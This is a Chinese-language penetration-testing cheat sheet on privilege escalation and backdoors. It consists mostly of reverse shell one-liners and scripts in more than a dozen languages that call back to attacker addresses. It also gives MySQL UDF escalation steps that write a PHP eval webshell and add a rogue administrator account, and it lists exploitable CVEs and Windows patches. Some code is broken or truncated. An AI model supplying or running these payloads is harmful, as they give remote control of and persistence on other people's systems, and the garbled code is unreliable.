提权和后门
反弹 shell¶
后门:https://github.com/LukaSikic/HaCoder.py
nc -e /bin/bash 4.4.9.102 8080
bash -c 'bash -i >/dev/tcp/4.4.9.102/8080 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.2 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.2:8080 #4.4.9.102
php¶
<?php
error_reporting (E_ERROR);
ignore_user_abort(true);
ini_set('max_execution_time',0);
$os = substr(PHP_OS,0,3);
$ipaddr = '192.168.0.1';
$port = '65535';
$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
$cwd = getcwd();
$msg = php_uname()
if($os == 'WIN') {
$env = array('path' => 'c:\\windows\\system32');
} else {
$env = array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
}
if(function_exists('fsockopen')) {
$sock = fsockopen($ipaddr,$port);
fwrite($sock,$msg);
while ($cmd = fread($sock,1024)) {
if (substr($cmd,0,3) == 'cd ') {
$cwd = trim(substr($cmd,3,-1));
chdir($cwd);
$cwd = getcwd();
}
if (trim(strtolower($cmd)) == 'exit') {
break;
} else {
$process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
if (is_resource($process)) {
fwrite($pipes[0],$cmd);
fclose($pipes[0]);
$msg = stream_get_contents($pipes[1]);
fwrite($sock,$msg);
fclose($pipes[1]);
$msg = stream_get_contents($pipes[2]);
fwrite($sock,$msg);
fclose($pipes[2]);
proc_close($process);
}
}
}
fclose($sock);
} else {
$sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
socket_connect($sock,$ipaddr,$port);
socket_write($sock,$msg);
fwrite($sock,$msg);
while ($cmd = socket_read($sock,1024)) {
if (substr($cmd,0,3) == 'cd ') {
$cwd = trim(substr($cmd,3,-1));
chdir($cwd);
$cwd = getcwd();
}
if (trim(strtolower($cmd)) == 'exit') {
break;
} else {
$process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
if (is_resource($process)) {
fwrite($pipes[0],$cmd);
fclose($pipes[0]);
$msg = stream_get_contents($pipes[1]);
socket_write($sock,$msg,strlen($msg));
fclose($pipes[1]);
$msg = stream_get_contents($pipes[2]);
socket_write($sock,$msg,strlen($msg));
fclose($pipes[2]);
<?php
$sock=fsockopen("192.168.0.1",65535);
exec("/bin/bash -i <&3 >&3 2>&3");
?>
php -r "error_reporting(E_ERROR);ignore_user_abort(true);ini_set('max_execution_time',0);\$os=substr(PHP_OS,0,3);\$ipaddr='192.168.0.1';\$port='65535';\$descriptorspec=array(0=>array(\"pipe\",\"r\"),1=>array(\"pipe\",\"w\"),2=>array(\"pipe\",\"w\"));\$cwd=getcwd();\$msg=php_uname()if(\$os=='WIN'){\$env=array('path'=>'c:\\windows\\system32');}else{\$env=array('path'=>'/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');}if(function_exists('fsockopen')){\$sock=fsockopen(\$ipaddr,\$port);fwrite(\$sock,\$msg);while(\$cmd=fread(\$sock,1024)){if(substr(\$cmd,0,3)=='cd'){\$cwd=trim(substr(\$cmd,3,-1));chdir(\$cwd);\$cwd=getcwd();}if(trim(strtolower(\$cmd))=='exit'){break;}else{\$process=proc_open(\$cmd,\$descriptorspec,\$pipes,\$cwd,\$env);if(is_resource(\$process)){fwrite(\$pipes[0],\$cmd);fclose(\$pipes[0]);\$msg=stream_get_contents(\$pipes[1]);fwrite(\$sock,\$msg);fclose(\$pipes[1]);\$msg=stream_get_contents(\$pipes[2]);fwrite(\$sock,\$msg);fclose(\$pipes[2]);proc_close(\$process);}}}fclose(\$sock);}else{\$sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_connect(\$sock,\$ipaddr,\$port);socket_write(\$sock,\$msg);fwrite(\$sock,\$msg);while(\$cmd=socket_read(\$sock,1024)){if(substr(\$cmd,0,3)=='cd'){\$cwd=trim(substr(\$cmd,3,-1));chdir(\$cwd);\$cwd=getcwd();}if(trim(strtolower(\$cmd))=='exit'){break;}else{\$process=proc_open(\$cmd,\$descriptorspec,\$pipes,\$cwd,\$env);if(is_resource(\$process)){fwrite(\$pipes[0],\$cmd);fclose(\$pipes[0]);\$msg=stream_get_contents(\$pipes[1]);socket_write(\$sock,\$msg,strlen(\$msg));fclose(\$pipes[1]);\$msg=stream_get_contents(\$pipes[2]);socket_write(\$sock,\$msg,strlen(\$msg));fclose(\$pipes[2]);proc_close(\$process);}}}socket_close(\$sock);}"
python¶
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket()
s.connect(("192.168.0.1",65535))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
python -c "import socket,subprocess,os;s=socket.socket();s.connect((\"192.168.0.1\",65535));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"])"
#!usr/bin/python
import sys,socket,os,pty;
s=socket.socket()
s.connect(("192.168.0.1",65535))
for fd in (0,1,2):
os.dup2(s.fileno(),fd)
pty.spawn("/bin/bash")
#!/usr/bin/python
import socket, subprocess
s = socket.socket()
s.connect(('192.168.0.1',65535))
while 1:
proc = subprocess.Popen(s.recv(1024),\
shell=True,\
stdout=subprocess.PIPE,\
stderr=subprocess.PIPE,\
stdin=subprocess.PIPE\
)
s.send(proc.stdout.read()+proc.stderr.read())
package main;
import"os/exec";
import"net";
func main(){
c,_:=net.Dial("tcp","192.168.0.1:65535");
cmd:=exec.Command("/bin/bash");
cmd.Stdin=c;
cmd.Stdout=c;
cmd.Stderr=c;
cmd.Run()}
ruby¶
#!/usr/bin/ruby
require 'socket'
require 'open3'
#Set the Remote Host IP
RHOST = "192.168.0.1"
#Set the Remote Host Port
PORT = "65535"
#Tries to connect every 20 sec until it connects.
begin
sock = TCPSocket.new "#{RHOST}", "#{PORT}"
sock.puts "We are connected!"
rescue
sleep 20
retry
end
#Runs the commands you type and sends you back the stdout and stderr.
begin
while line = sock.gets
Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
IO.copy_stream(stdout_and_stderr, sock)
end
end
rescue
retry
end
perl¶
#!/usr/bin/perl
use Socket;
$i="192.168.0.1";
$p=65535;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i))))
{
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/bash -i");
};
#!/usr/bin/perl
$p=fork;
exit,if($p);
$c=new IO::Socket::INET(PeerAddr,"192.168.0.1:65535");
STDIN->fdopen($c,r);
$~->fdopen($c,w);
system$_ while<>;
lua¶
#!/usr/bin/lua
local host, port = "192.168.0.1", 65535
local socket = require("socket")
local tcp = socket.tcp()
local io = require("io")
tcp:connect(host, port);
while true
do local cmd, status, partial = tcp:receive()
local f = io.popen(cmd, "r")
local s = f:read("*a")
f:close()
tcp:send(s)
if status == "closed"
then break
end
end
tcp:close()
java¶
public classRevs{
/**
* @param args
* @throws Exception
*/
publicstaticvoidmain(String[] args) throws Exception {
// TODO Auto-generated method stub
Runtime r = Runtime.getRuntime();
String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.1/65535;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process p = r.exec(cmd);
p.waitFor();
}
}
c¶
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
voidusage();
char shell[]="/bin/bash";
char message[]="hacker welcome\n";
int sock;
intmain(int argc, char *argv[]) {
if(argc <3){
usage(argv[0]);
}
struct sockaddr_in server;
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Couldn't make socket!n"); exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(65535);
server.sin_addr.s_addr = inet_addr("192.168.0.1");
if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {
printf("Could not connect to remote shell!n");
exit(-1);
}
send(sock, message, sizeof(message), 0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl(shell,"/bin/bash",(char *)0);
close(sock);
return 1;
}
voidusage(char *prog[]) {
printf("Usage: %s <reflect ip> <port>n", prog);
exit(-1);
}
gawk¶
BEGIN{
s="/inet/tcp/0/192.168.0.1/65535";
while(1){
do{
s|&getline c;
if(c){
while((c|&getline)>0)
print $0|&s;
close(c)
}
}
while(c!="exit");
close(s)
}
}
tcl¶
set s [socket 192.168.0.1 65535];
while 42 {
puts -nonewline $s "shell>";
flush $s;
gets $s c;
set e "exec $c";
if {![catch {set r [eval $e]} err]} {
puts $s $r
};
flush $s;
};
close $s;
mssql 提权¶
TODO
mysql 提权¶
UDF 提权¶
虽然 MySQL 的内置函数虽然丰富,但毕竟不能满足所有人的需要,有时候我们需要对表中的数据进行一些处理而内置函数不能满足需要的时候,就需要对 MySQL 进行一些扩展,这就是可以自行添加的 MySQL 的 UDF。
MYSQL5.1 及之后的几个版本又多了一个限制:创建函数时所用的 DLL 只能放在 mysql 的 plugin 目录里面,而且这个 plugin 目录默认是不存在的,可能就是为了防止黑客通过导出文件的方式将 DLL 来写到这个文件夹,如果导出文件(into dumpfile)的目标目录不存在是会报错的。
所以在导出 UDF 提权之前 ,先确定一下 MYSQL 的版本是有必要的(select version();)
写入一句话木马¶
union select
0x3c3f70687020406576616c28245f504f53545b2770617373275d293b3f3e,2,3 into
dumpfile 'c:/www/small.php'
# 以上语句连续执行两次,如果出现以下错误,即说明文件写入成功:
# Invalid Query:File 'c:/www/small.php' already exists
# 第二次写入提示文件已存在则说明文件写入成功
查看 MYsql 安装根目录¶
select @@basedir;
根据 我们前面讲述的 MySQL5.1 版本及其之后版本,我们自定义函数需要用到的 shell 导出的目录应该是:
C:/Program Files/phpStudy/MySQL/lib/plugin/
其实也可以通过以下语句获得插件目录(并不一定真实存在):
show variables like '%plugin%';
创建/lib/plugin 目录¶
select 'test' into dumpfile 'C:/Program Files/phpStudy/MySQL/lib::INDEX_ALLOCATION';
# 利用NTFS ADS创建lib目录
select 'test' into dumpfile 'C:/Program Files/phpStudy/MySQL/lib/plugin::INDEX_ALLOCATION';
# 利用NTFS ADS创建plugin目录
利用 NTFS ADS 创建目录成功率很小,这个命令执行返回一直为空,二次执行不提示目录已存在,即可判断目录创建失败。如上图即目录创建失败。
将 udf.dll 导出到 plugin 目录
select load_file('C:/www/udf.dll') into dumpfile 'C:/Program Files/phpStudy/MySQL/lib/plugin/udf.dll';
通过 sql 语句通过 udf.dll 创建 shell 函数
create function shell returns string soname 'udf.dll';
# 假设此时udf.dll被上传到了c:\windows\system32目录
create function shell returns string soname 'C:udf.dll';
# 假设此时udf.dll被上传到了C盘根目录目录
create function shell returns string soname 'udf.dll';
# 假设此时udf.dll被上传到了任意的环境变量目录,如C:\php\
用法¶
shell函数用于执行系统命令,用法如下
# 我们尝试在服务器添加一个用户名为`matrix`密码为`matrix`的账户:
select shell('cmd','net user matrix matrix /add');
# 接着尝试把`matrix`账户添加到`administrators`管理组:
select shell('cmd','net localgroup administrators matrix /add');
# 然后查看详细的账户信息,确认是否已经成功添加上账户和账户是否已经被成功添加到管理员组。如下操作:
select shell('cmd','net user matrix');
提权完毕之后我们可以通过以下语句删除相关函数以防被他人利用:
drop function shell;
# 删除函数
delete from mysql.func where name='shell';
# 删除函数
linux¶
- CVE-2016-5195 脏牛漏洞
- CVE-2016-8655:Linux 内核竞争条件漏洞
- CVE-2017-1000367 sudo 本地提权漏洞:selinux 必须开
win¶
系统密码破解¶
- getpass.exe
- minikz
补丁对应漏洞¶
KB2360937 →MS10-084
KB2478960 →MS11-014
KB2507938→ MS11-056
KB2566454→ MS11-062
KB2646524 →MS12-003
KB2645640→ MS12-009
KB2641653→ MS12-018
KB944653 →MS07-067
KB952004 →MS09-012
KB971657 →MS09-041
KB2620712→ MS11-097
KB2393802→ MS11-011
kb942831 →MS08-005
KB2503665 →MS11-046
KB2592799→ MS11-080
SSHD 后门¶
更改auth_password 函数
本页面的全部内容在 CC BY-NC-SA 4.0 协议之条款下提供,附加条款亦可能应用。